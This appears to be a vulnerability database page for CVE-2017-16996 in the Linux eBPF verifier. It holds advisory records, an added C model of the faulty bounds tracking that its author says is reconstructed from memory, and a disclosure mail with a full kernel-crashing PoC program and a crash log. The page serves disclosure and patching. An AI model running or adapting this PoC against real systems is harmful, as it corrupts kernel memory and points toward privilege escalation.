kernel/bpf/verifier.c in the Linux kernel through 4.14.8 allows local users to cause a denial of service (memory corruption) or possibly have unspecified other impact by leveraging register truncation mishandling.
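The "register truncation mishandling" in the description is a bounds-tracking error in the verifier's abstract domain rather than a conventional overflow, so it is worth seeing the arithmetic that goes wrong. The following user-space model is an added example; it is not code from this page, from the Project Zero report quoted in the record below, or from the kernel tree. It reconstructs, from memory of the v4.14 sources, the tnum helpers (kernel/bpf/tnum.c) and the bounds update that the buggy coerce_reg_to_32() relied on, places the fixed widening logic from the commit "bpf: fix incorrect tracking of register size truncation" beside it as I recall it, and feeds both the register state the Project Zero PoC constructs (r1 = 0xfffffff8 plus a value the verifier only knows to be in [0, 0xf], actually 8). The struct reg_state is a reduced stand-in for struct bpf_reg_state, and ACTUAL_R1 is the concrete value the program holds at run time, taken from the PoC's comments.

```c
/* Added example: model of how the 4.14 eBPF verifier bounded a register
 * across a 32-bit truncation (buggy) vs. the fixed logic. Helpers are
 * reconstructed from memory of kernel/bpf/tnum.c and verifier.c (v4.14);
 * struct reg_state is a reduced stand-in for struct bpf_reg_state. */
#include <stdint.h>
#include <stdio.h>

#define SIGN_BIT 0x8000000000000000ULL
#define ACTUAL_R1 0x100000000ULL   /* PoC: r3 is really 8, so r1 = 0xfffffff8 + 8 */

/* Tristate number: bits set in mask are unknown, the rest are given by value. */
struct tnum { uint64_t value; uint64_t mask; };

struct reg_state {
    struct tnum var_off;
    int64_t  smin_value, smax_value;
    uint64_t umin_value, umax_value;
};

/* tnum_add from kernel/bpf/tnum.c: propagate carries as unknown bits. */
static struct tnum tnum_add(struct tnum a, struct tnum b)
{
    uint64_t sm = a.mask + b.mask, sv = a.value + b.value;
    uint64_t sigma = sm + sv, chi = sigma ^ sv, mu = chi | a.mask | b.mask;
    return (struct tnum){ sv & ~mu, mu };
}

/* tnum_cast: drop the bits above `size` bytes from the tristate view. */
static struct tnum tnum_cast(struct tnum a, int size)
{
    uint64_t m = (1ULL << (size * 8)) - 1;
    return (struct tnum){ a.value & m, a.mask & m };
}

/* __update_reg_bounds: intersect the arithmetic bounds with the tnum bounds. */
static void update_reg_bounds(struct reg_state *r)
{
    int64_t smin_t = (int64_t)(r->var_off.value | (r->var_off.mask & SIGN_BIT));
    int64_t smax_t = (int64_t)(r->var_off.value | (r->var_off.mask & ~SIGN_BIT));
    uint64_t umax_t = r->var_off.value | r->var_off.mask;
    if (smin_t > r->smin_value) r->smin_value = smin_t;
    if (smax_t < r->smax_value) r->smax_value = smax_t;
    if (r->var_off.value > r->umin_value) r->umin_value = r->var_off.value;
    if (umax_t < r->umax_value) r->umax_value = umax_t;
}

/* r1 = 0xfffffff8 (constant) + r3, r3 in [0, 0xf] after "AND 0xf" (BPF_ALU64 ADD). */
static struct reg_state build_poc_register(void)
{
    struct reg_state r1 = { .var_off = {0xfffffff8ULL, 0}, .smin_value = 0xfffffff8,
                            .smax_value = 0xfffffff8, .umin_value = 0xfffffff8ULL,
                            .umax_value = 0xfffffff8ULL };
    struct reg_state r3 = { .var_off = {0, 0xf}, .smin_value = 0, .smax_value = 0xf,
                            .umin_value = 0, .umax_value = 0xf };
    struct reg_state sum;
    sum.smin_value = r1.smin_value + r3.smin_value;   /* no overflow for these inputs */
    sum.smax_value = r1.smax_value + r3.smax_value;
    sum.umin_value = r1.umin_value + r3.umin_value;
    sum.umax_value = r1.umax_value + r3.umax_value;
    sum.var_off = tnum_add(r1.var_off, r3.var_off);
    update_reg_bounds(&sum);
    return sum;                                        /* [0xfffffff8, 0x100000007] */
}

/* 4.14 coerce_reg_to_32: cast the tnum, then intersect the OLD 64-bit bounds
 * with it. The old bounds straddle 2^32, so the wrapped values [0, 7] vanish. */
static struct reg_state truncate_buggy(void)
{
    struct reg_state r = build_poc_register();
    r.var_off = tnum_cast(r.var_off, 4);
    update_reg_bounds(&r);
    return r;                                          /* [0xfffffff8, 0xffffffff] */
}

/* Fixed coerce_reg_to_size (as I recall it): if umin and umax differ in the
 * bits being dropped, the truncated value can wrap, so widen to [0, 2^32-1]. */
static struct reg_state truncate_fixed(void)
{
    struct reg_state r = build_poc_register();
    uint64_t mask = 0xffffffffULL;
    r.var_off = tnum_cast(r.var_off, 4);
    if ((r.umin_value & ~mask) == (r.umax_value & ~mask)) {
        r.umin_value &= mask;
        r.umax_value &= mask;
    } else {
        r.umin_value = 0;
        r.umax_value = mask;
    }
    r.smin_value = (int64_t)r.umin_value;
    r.smax_value = (int64_t)r.umax_value;
    return r;
}

/* Soundness check: do the verifier's bounds admit the value r1 really holds
 * after the 32-bit ALU op (ACTUAL_R1 truncated to 32 bits, i.e. 0)? */
static int bounds_admit(struct reg_state r, uint64_t v)
{
    return v >= r.umin_value && v <= r.umax_value;
}
static int buggy_admits_actual(void) { return bounds_admit(truncate_buggy(), ACTUAL_R1 & 0xffffffffULL); }
static int fixed_admits_actual(void) { return bounds_admit(truncate_fixed(), ACTUAL_R1 & 0xffffffffULL); }

int main(void)
{
    struct reg_state bug = truncate_buggy(), fix = truncate_fixed();
    printf("actual r1 after 32-bit op: 0x%llx\n", (unsigned long long)(ACTUAL_R1 & 0xffffffffULL));
    printf("4.14 bounds:  [0x%llx, 0x%llx] admits it: %d\n", (unsigned long long)bug.umin_value,
           (unsigned long long)bug.umax_value, buggy_admits_actual());
    printf("fixed bounds: [0x%llx, 0x%llx] admits it: %d\n", (unsigned long long)fix.umin_value,
           (unsigned long long)fix.umax_value, fixed_admits_actual());
    return 0;
}
```

The unsound [0xfffffff8, 0xffffffff] is exactly what the PoC in the record exploits: a right shift by 31 turns that range into the constant 1 in the verifier's eyes while the real value is 0, and the later shift by 60 produces a 0x1000'0000'0000'0000 offset the verifier believes is zero.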
{"cve": [{"lastseen": "2022-03-23T14:54:24", "description": "kernel/bpf/verifier.c in the Linux kernel through 4.14.8 allows local users to cause a denial of service (memory corruption) or possibly have unspecified other impact by leveraging register truncation mishandling.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-12-27T17:08:00", "type": "cve", "title": "CVE-2017-16996", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-16996"], "modified": "2018-01-09T17:48:00", "cpe": ["cpe:/o:debian:debian_linux:9.0", "cpe:/o:linux:linux_kernel:4.14.8"], "id": "CVE-2017-16996", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-16996", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:4.14.8:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*"]}], "redhatcve": [{"lastseen": "2022-07-07T11:11:20", "description": "An arbitrary memory r/w access issue was found in the Linux kernel compiled with the eBPF bpf(2) system call (CONFIG_BPF_SYSCALL) support. 
The issue could occur due to calculation errors in the eBPF verifier module, triggered by user supplied malicious BPF program. An unprivileged user could use this flaw to escalate their privileges on a system. Setting parameter \"kernel.unprivileged_bpf_disabled=1\" prevents such privilege escalation by restricting access to bpf(2) call.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-03-08T13:43:55", "type": "redhatcve", "title": "CVE-2017-16996", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-16996"], "modified": "2022-07-07T09:15:05", "id": "RH:CVE-2017-16996", "href": "https://access.redhat.com/security/cve/cve-2017-16996", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "ubuntucve": [{"lastseen": "2022-08-04T13:53:52", "description": "kernel/bpf/verifier.c in the Linux kernel through 4.14.8 allows local users\nto cause a denial of service (memory corruption) or possibly have\nunspecified other impact by leveraging register truncation mishandling.\n\n#### Bugs\n\n * <https://bugs.chromium.org/p/project-zero/issues/detail?id=1454>\n\n\n#### Notes\n\nAuthor| Note \n---|--- 
\n[tyhicks](<https://launchpad.net/~tyhicks>) | Mitigation for this vulnerability is available by setting the kernel.unprivileged_bpf_disabled sysctl to 1: $ sudo sysctl kernel.unprivileged_bpf_disabled=1 $ echo kernel.unprivileged_bpf_disabled=1 | \\ sudo tee /etc/sysctl.d/90-CVE-2017-16995-CVE-2017-16996.conf\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-12-27T00:00:00", "type": "ubuntucve", "title": "CVE-2017-16996", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-16995", "CVE-2017-16996"], "modified": "2017-12-27T00:00:00", "id": "UB:CVE-2017-16996", "href": "https://ubuntu.com/security/CVE-2017-16996", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-04T13:53:55", "description": "The check_alu_op function in kernel/bpf/verifier.c in the Linux kernel\nthrough 4.4 allows local users to cause a denial of service (memory\ncorruption) or possibly have unspecified other impact by leveraging\nincorrect sign extension.\n\n#### Bugs\n\n * <https://bugs.chromium.org/p/project-zero/issues/detail?id=1454>\n\n\n#### Notes\n\nAuthor| Note \n---|--- 
\n[tyhicks](<https://launchpad.net/~tyhicks>) | Mitigation for this vulnerability is available by setting the kernel.unprivileged_bpf_disabled sysctl to 1: $ sudo sysctl kernel.unprivileged_bpf_disabled=1 $ echo kernel.unprivileged_bpf_disabled=1 | \\ sudo tee /etc/sysctl.d/90-CVE-2017-16995-CVE-2017-16996.conf \n[smb](<https://launchpad.net/~smb>) | Current breaks sha1 (taken from the fix patch) only makes 4.14+ affected. However upstream stable backported a fix for it. So I will modify the breaks sha1 to point to when the surrounding code was added.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-12-27T00:00:00", "type": "ubuntucve", "title": "CVE-2017-16995", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-16995", "CVE-2017-16996"], "modified": "2017-12-27T00:00:00", "id": "UB:CVE-2017-16995", "href": "https://ubuntu.com/security/CVE-2017-16995", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2018-01-01T13:00:47", "description": "Exploit for linux platform in category dos / poc", "cvss3": {}, "published": "2017-12-22T00:00:00", "type": "zdt", "title": "Linux Kernel >= 
4.9 eBPF memory corruption bugs Vulnerability", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-16995", "CVE-2017-16996"], "modified": "2017-12-22T00:00:00", "id": "1337DAY-ID-29285", "href": "https://0day.today/exploit/description/29285", "sourceData": "Hi!\r\n\r\nA few BPF verifier bugs in the Linux kernel, most of which can be used\r\nfor controlled memory corruption, have been fixed over the last days.\r\nOne of the bugs was introduced in 4.9, the others were only introduced\r\nin 4.14.\r\n\r\nThe fixes are in the net tree of the Linux kernel\r\n(https://git.kernel.org/pub/scm/linux/kernel/git/davem/net.git/log/kernel/bpf),\r\nbut not in Linus' tree yet.\r\n\r\nThe following bug was introduced in 4.9:\r\n\r\n=== fixed by \"bpf: fix incorrect sign extension in check_alu_op()\" ===\r\ncheck_alu_op() did not distinguish between\r\nBPF_ALU64|BPF_MOV|BPF_K (load 32-bit immediate, sign-extended to 64-bit)\r\nand BPF_ALU|BPF_MOV|BPF_K (load 32-bit immediate, zero-padded to 64-bit);\r\nit performed sign extension in both cases.\r\nDebian assigned CVE-2017-16995 for this issue.\r\n\r\n\r\nThe following bugs were introduced in 4.14:\r\n\r\n=== fixed by \"bpf/verifier: fix bounds calculation on BPF_RSH\" ===\r\nIncorrect signed bounds were being computed for BPF_RSH.\r\nIf the old upper signed bound was positive and the old lower signed bound was\r\nnegative, this could cause the new upper signed bound to be too low,\r\nleading to security issues.\r\n\r\n=== fixed by \"bpf: fix incorrect tracking of register size truncation\" ===\r\nThe BPF verifier did not properly handle register truncation to a smaller size.\r\n\r\nThe old code first mirrors the clearing of the high 32 bits in the bitwise\r\ntristate representation, which is correct. But then, it computes the new\r\narithmetic bounds as the intersection between the old arithmetic bounds and\r\nthe bounds resulting from the bitwise tristate representation. 
Therefore,\r\nwhen coerce_reg_to_32() is called on a number with bounds\r\n[0xffff'fff8, 0x1'0000'0007], the verifier computes\r\n[0xffff'fff8, 0xffff'ffff] as bounds of the truncated number.\r\nThis is incorrect: The truncated number could also be in the range [0, 7],\r\nand no meaningful arithmetic bounds can be computed in that case apart from\r\nthe obvious [0, 0xffff'ffff].\r\nDebian assigned CVE-2017-16996 for this issue.\r\n\r\n=== fixed by \"bpf: fix 32-bit ALU op verification\" ===\r\nadjust_scalar_min_max_vals() only truncates its inputs and otherwise operates on\r\n64-bit numbers while the BPF interpreter and JIT perform 32-bit arithmetic.\r\nThis means that the output of e.g. `(u32)0x40000000*(u32)5` will be incorrect.\r\nTo test this, you can use the following BPF code:\r\n\r\n BPF_MOV32_IMM(BPF_REG_1, 0x40000000),\r\n BPF_ALU32_IMM(BPF_MUL, BPF_REG_1, 5),\r\n BPF_EXIT_INSN()\r\n\r\nThe verifier generates the following output, which is incorrect:\r\n\r\n 0: R1=ctx(id=0,off=0,imm=0) R10=fp0\r\n 0: (b4) (u32) r1 = (u32) 1073741824\r\n 1: R1=inv1073741824 R10=fp0\r\n 1: (24) (u32) r1 *= (u32) 5\r\n 2: R1=inv5368709120 R10=fp0\r\n 2: (95) exit\r\n R0 !read_ok\r\n\r\n=== fixed by \"bpf: fix missing error return in check_stack_boundary()\" ===\r\ncheck_stack_boundary() prints an error into the verifier log, but doesn't\r\nexit, when a stack pointer doesn't have a known offset. 
This should be\r\nusable to get read+write access to spilled stack pointers.\r\n\r\n=== fixed by \"bpf: force strict alignment checks for stack pointers\" ===\r\nThe verifier did not force strict alignment checks for stack pointers, but\r\nthe tracking of stack spills relies on it; unaligned stack accesses can\r\nlead to corruption of spilled registers, which is exploitable.\r\n\r\n=== fixed by \"bpf: don't prune branches when a scalar is replaced with\r\na pointer\" ===\r\nThe BPF verifier pruned branches when a scalar is replaced with\r\na pointer, explicitly permitting confusing a pointer into a number\r\n(but not the other way around). This is a kernel pointer leak.\r\n\r\n=== fixed by \"bpf: fix integer overflows\" ===\r\nThere were various issues related to the limited size of integers used in\r\nthe verifier:\r\n - `off + size` overflow in __check_map_access()\r\n - `off + reg->off` overflow in check_mem_access()\r\n - `off + reg->var_off.value` overflow or 32-bit truncation of\r\n `reg->var_off.value` in check_mem_access()\r\n - 32-bit truncation in check_stack_boundary()\r\n\r\n\r\n\r\nCrash PoCs for some of these issues are at\r\nhttps://bugs.chromium.org/p/project-zero/issues/detail?id=1454,\r\nbut since oss-security prefers having PoCs in the mail directly, I've\r\npasted the PoCs below.\r\nFor the other issues, examples of how to trigger them are in the\r\nadded BPF selftests.\r\nThe rest of the mail is just PoC code, so if you're not interested\r\nin the PoCs, you can stop reading now.\r\n\r\n\r\n\r\n\r\n=== PoC for \"bpf: fix incorrect sign extension in check_alu_op()\" ===\r\nHere is a crasher that tries to write to a noncanonical address.\r\nNote that it is only designed to work on 4.14.\r\n\r\n======================================\r\n[email\u00a0protected]:~/bpf_range$ cat crasher_badimm.c\r\n#define _GNU_SOURCE\r\n#include <err.h>\r\n#include <stdint.h>\r\n#include <linux/bpf.h>\r\n#include <linux/filter.h>\r\n#include <stdio.h>\r\n#include 
<unistd.h>\r\n#include <sys/syscall.h>\r\n#include <asm/unistd_64.h>\r\n#include <sys/types.h>\r\n#include <sys/socket.h>\r\n\r\n/* start from kernel */\r\n#define BPF_EMIT_CALL(FUNC) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_JMP | BPF_CALL, \\\r\n .dst_reg = 0, \\\r\n .src_reg = 0, \\\r\n .off = 0, \\\r\n .imm = (FUNC) }) /* ??? */\r\n#define BPF_MOV32_IMM(DST, IMM) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_ALU | BPF_MOV | BPF_K, \\\r\n .dst_reg = DST, \\\r\n .src_reg = 0, \\\r\n .off = 0, \\\r\n .imm = IMM })\r\n#define BPF_REG_ARG1 BPF_REG_1\r\n#define BPF_REG_ARG2 BPF_REG_2\r\n#define BPF_REG_ARG3 BPF_REG_3\r\n#define BPF_REG_ARG4 BPF_REG_4\r\n#define BPF_REG_ARG5 BPF_REG_5\r\n#define BPF_PSEUDO_MAP_FD 1\r\n#define BPF_LD_IMM64_RAW(DST, SRC, IMM) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_LD | BPF_DW | BPF_IMM, \\\r\n .dst_reg = DST, \\\r\n .src_reg = SRC, \\\r\n .off = 0, \\\r\n .imm = (__u32) (IMM) }), \\\r\n ((struct bpf_insn) { \\\r\n .code = 0, /* zero is reserved opcode */ \\\r\n .dst_reg = 0, \\\r\n .src_reg = 0, \\\r\n .off = 0, \\\r\n .imm = ((__u64) (IMM)) >> 32 })\r\n#define BPF_ALU32_IMM(OP, DST, IMM) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_ALU | BPF_OP(OP) | BPF_K, \\\r\n .dst_reg = DST, \\\r\n .src_reg = 0, \\\r\n .off = 0, \\\r\n .imm = IMM })\r\n#define BPF_LD_MAP_FD(DST, MAP_FD) \\\r\n BPF_LD_IMM64_RAW(DST, BPF_PSEUDO_MAP_FD, MAP_FD)\r\n#define BPF_ALU32_REG(OP, DST, SRC) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_ALU | BPF_OP(OP) | BPF_X, \\\r\n .dst_reg = DST, \\\r\n .src_reg = SRC, \\\r\n .off = 0, \\\r\n .imm = 0 })\r\n#define BPF_EXIT_INSN() \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_JMP | BPF_EXIT, \\\r\n .dst_reg = 0, \\\r\n .src_reg = 0, \\\r\n .off = 0, \\\r\n .imm = 0 })\r\n/* Memory store, *(uint *) (dst_reg + off16) = src_reg */\r\n#define BPF_STX_MEM(SIZE, DST, SRC, OFF) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_STX | BPF_SIZE(SIZE) | BPF_MEM, \\\r\n .dst_reg = DST, \\\r\n .src_reg = SRC, \\\r\n 
.off = OFF, \\\r\n .imm = 0 })\r\n#define BPF_REG_FP BPF_REG_10\r\n#define BPF_MOV64_REG(DST, SRC) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_ALU64 | BPF_MOV | BPF_X, \\\r\n .dst_reg = DST, \\\r\n .src_reg = SRC, \\\r\n .off = 0, \\\r\n .imm = 0 })\r\n#define BPF_ALU64_IMM(OP, DST, IMM) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_ALU64 | BPF_OP(OP) | BPF_K, \\\r\n .dst_reg = DST, \\\r\n .src_reg = 0, \\\r\n .off = 0, \\\r\n .imm = IMM })\r\n#define BPF_MOV64_REG(DST, SRC) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_ALU64 | BPF_MOV | BPF_X, \\\r\n .dst_reg = DST, \\\r\n .src_reg = SRC, \\\r\n .off = 0, \\\r\n .imm = 0 })\r\n#define BPF_REG_TMP BPF_REG_8\r\n#define BPF_LDX_MEM(SIZE, DST, SRC, OFF) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_LDX | BPF_SIZE(SIZE) | BPF_MEM, \\\r\n .dst_reg = DST, \\\r\n .src_reg = SRC, \\\r\n .off = OFF, \\\r\n .imm = 0 })\r\n#define BPF_JMP_IMM(OP, DST, IMM, OFF) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_JMP | BPF_OP(OP) | BPF_K, \\\r\n .dst_reg = DST, \\\r\n .src_reg = 0, \\\r\n .off = OFF, \\\r\n .imm = IMM })\r\n#define BPF_MOV64_IMM(DST, IMM) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_ALU64 | BPF_MOV | BPF_K, \\\r\n .dst_reg = DST, \\\r\n .src_reg = 0, \\\r\n .off = 0, \\\r\n .imm = IMM })\r\n#define BPF_ALU64_REG(OP, DST, SRC) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_ALU64 | BPF_OP(OP) | BPF_X, \\\r\n .dst_reg = DST, \\\r\n .src_reg = SRC, \\\r\n .off = 0, \\\r\n .imm = 0 })\r\n#define BPF_MOV32_REG(DST, SRC) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_ALU | BPF_MOV | BPF_X, \\\r\n .dst_reg = DST, \\\r\n .src_reg = SRC, \\\r\n .off = 0, \\\r\n .imm = 0 })\r\n/* end from kernel */\r\n\r\n\r\nint bpf_(int cmd, union bpf_attr *attrs) {\r\n return syscall(__NR_bpf, cmd, attrs, sizeof(*attrs));\r\n}\r\n\r\nvoid array_set(int mapfd, uint32_t key, uint32_t value) {\r\n union bpf_attr attr = {\r\n .map_fd = mapfd,\r\n .key = (uint64_t)&key,\r\n .value = (uint64_t)&value,\r\n .flags = BPF_ANY,\r\n 
};\r\n\r\n\r\n int res = bpf_(BPF_MAP_UPDATE_ELEM, &attr);\r\n if (res)\r\n err(1, \"map update elem\");\r\n}\r\n\r\n\r\nint main(void) {\r\n union bpf_attr create_map_attrs = {\r\n .map_type = BPF_MAP_TYPE_ARRAY,\r\n .key_size = 4,\r\n .value_size = 8,\r\n .max_entries = 16\r\n };\r\n int mapfd = bpf_(BPF_MAP_CREATE, &create_map_attrs);\r\n if (mapfd == -1)\r\n err(1, \"map create\");\r\n\r\n\r\n array_set(mapfd, 1, 1);\r\n\r\n char verifier_log[100000];\r\n struct bpf_insn insns[] = {\r\n BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),\r\n\r\n // fill r0 with pointer to map value\r\n BPF_MOV64_REG(BPF_REG_TMP, BPF_REG_FP),\r\n BPF_ALU64_IMM(BPF_ADD, BPF_REG_TMP, -4), // allocate 4 bytes stack\r\n BPF_MOV32_IMM(BPF_REG_ARG2, 1),\r\n BPF_STX_MEM(BPF_W, BPF_REG_TMP, BPF_REG_ARG2, 0),\r\n BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_TMP),\r\n BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),\r\n BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 2),\r\n BPF_MOV64_REG(BPF_REG_0, 0), // prepare exit\r\n BPF_EXIT_INSN(), // exit\r\n\r\n // r1 = 0xffff'ffff, mistreated as 0xffff'ffff'ffff'ffff\r\n BPF_MOV32_IMM(BPF_REG_1, 0xffffffff),\r\n // r1 = 0x1'0000'0000, mistreated as 0\r\n BPF_ALU64_IMM(BPF_ADD, BPF_REG_1, 1),\r\n // r1 = 0x1000'0000'0000'0000, mistreated as 0\r\n BPF_ALU64_IMM(BPF_LSH, BPF_REG_1, 28),\r\n\r\n // compute noncanonical pointer\r\n BPF_ALU64_REG(BPF_ADD, BPF_REG_0, BPF_REG_1),\r\n\r\n // crash by writing to noncanonical pointer\r\n BPF_MOV32_IMM(BPF_REG_1, 0xdeadbeef),\r\n BPF_STX_MEM(BPF_W, BPF_REG_0, BPF_REG_1, 0),\r\n\r\n // terminate to make the verifier happy\r\n BPF_MOV32_IMM(BPF_REG_0, 0),\r\n BPF_EXIT_INSN()\r\n };\r\n union bpf_attr create_prog_attrs = {\r\n .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,\r\n .insn_cnt = sizeof(insns) / sizeof(insns[0]),\r\n .insns = (uint64_t)insns,\r\n .license = (uint64_t)\"\",\r\n .log_level = 2,\r\n .log_size = sizeof(verifier_log),\r\n .log_buf = (uint64_t)verifier_log\r\n };\r\n int progfd = bpf_(BPF_PROG_LOAD, &create_prog_attrs);\r\n if (progfd == 
-1) {\r\n perror(\"prog load\");\r\n puts(verifier_log);\r\n return 1;\r\n }\r\n puts(\"ok so far?\");\r\n\r\n int socks[2];\r\n if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks))\r\n err(1, \"socketpair\");\r\n if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(int)))\r\n err(1, \"setsockopt\");\r\n if (write(socks[1], \"a\", 1) != 1)\r\n err(1, \"write\");\r\n char c;\r\n if (read(socks[0], &c, 1) != 1)\r\n err(1, \"read res\");\r\n return 0;\r\n}\r\n[email\u00a0protected]:~/bpf_range$ gcc -o crasher_badimm crasher_badimm.c -Wall\r\n&& ./crasher_badimm\r\nok so far?\r\nSegmentation fault\r\n======================================\r\n\r\n\r\nHere is the resulting crash (note the corrupted heap address in R15):\r\n\r\n======================================\r\n[10599.403881] general protection fault: 0000 [#6] SMP KASAN\r\n[10599.403886] Modules linked in: binfmt_misc snd_hda_codec_generic\r\ncrct10dif_pclmul crc32_pclmul ghash_clmulni_intel snd_hda_intel\r\nsnd_hda_codec pcbc snd_hda_core qxl snd_hwdep snd_pcm snd_timer ttm\r\naesni_intel snd ppdev aes_x86_64 drm_kms_helper parport_pc crypto_simd\r\nsoundcore glue_helper drm parport evdev cryptd sg serio_raw pcspkr\r\nvirtio_console virtio_balloon button ip_tables x_tables autofs4 ext4\r\ncrc16 mbcache jbd2 fscrypto sr_mod cdrom sd_mod ata_generic 8139too\r\nehci_pci ata_piix uhci_hcd libata ehci_hcd 8139cp crc32c_intel mii\r\nvirtio_pci psmouse usbcore virtio_ring scsi_mod virtio i2c_piix4\r\nfloppy\r\n[10599.403952] CPU: 7 PID: 1610 Comm: crasher_badimm Tainted: G B D\r\n 4.15.0-rc1+ #4\r\n[10599.403954] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996),\r\nBIOS 1.10.2-1 04/01/2014\r\n[10599.403957] task: 000000004ae6ce3e task.stack: 000000006149ccc2\r\n[10599.403963] RIP: 0010:___bpf_prog_run+0x1a77/0x2490\r\n[10599.403966] RSP: 0018:ffff8801ef6bf838 EFLAGS: 00010292\r\n[10599.403969] RAX: 0000000000000000 RBX: ffffc900016150b8 RCX: ffffffff866483d7\r\n[10599.403971] RDX: 0000000000000001 RSI: 
